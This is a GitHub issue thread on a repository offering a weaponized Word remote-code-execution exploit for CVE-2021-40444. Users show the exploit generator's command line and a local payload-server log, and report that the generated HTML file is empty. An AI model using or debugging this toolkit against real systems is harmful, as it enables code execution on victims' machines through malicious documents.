search

klezVirus / CVE-2021-40444

CVE-2021-40444 - Fully Weaponized Microsoft Office Word RCE Exploit
800 stars 169 forks source link

The cab with dll doesn't work #15

Open RCECoder opened 2 years ago

RCECoder commented 2 years ago

Hi,

I used python generator.py -u http://127.0.0.1 -P test\calc.dll --host

To generate the exploit. When opening the docx to test locally, here is what showing up on the payload server

127.0.0.1 - - [14/Jul/2022 23:09:20] "OPTIONS / HTTP/1.1" 200 -
127.0.0.1 - - [14/Jul/2022 23:09:20] "HEAD /5S0OA8C3Z8W8.html HTTP/1.1" 200 -
127.0.0.1 - - [14/Jul/2022 23:09:20] "GET /5S0OA8C3Z8W8.html HTTP/1.1" 200 -
127.0.0.1 - - [14/Jul/2022 23:09:20] "HEAD /5S0OA8C3Z8W8.html HTTP/1.1" 200 -
127.0.0.1 - - [14/Jul/2022 23:09:20] "HEAD /5S0OA8C3Z8W8.html HTTP/1.1" 200 -
127.0.0.1 - - [14/Jul/2022 23:09:20] "OPTIONS / HTTP/1.1" 200 -
127.0.0.1 - - [14/Jul/2022 23:09:20] "HEAD /5S0OA8C3Z8W8.html HTTP/1.1" 200 -
127.0.0.1 - - [14/Jul/2022 23:09:20] "GET /5S0OA8C3Z8W8.html HTTP/1.1" 200 -
127.0.0.1 - - [14/Jul/2022 23:09:20] "HEAD /5S0OA8C3Z8W8.html HTTP/1.1" 200 -
127.0.0.1 - - [14/Jul/2022 23:09:20] "HEAD /5S0OA8C3Z8W8.html HTTP/1.1" 200 -
127.0.0.1 - - [14/Jul/2022 23:09:20] "GET /5S0OA8C3Z8W8.html HTTP/1.1" 200 -
127.0.0.1 - - [14/Jul/2022 23:09:21] "HEAD /5S0OA8C3Z8W8.html HTTP/1.1" 200 -

What could be wrong? or am I missing something?

RCECoder commented 2 years ago

Updated to add more info. Why is the HTML file generated (the one with random name in \srv) is 0 bytes in size. Is this normal?

alien2003 commented 2 years ago

I confirm this issue, resulting HTML file is null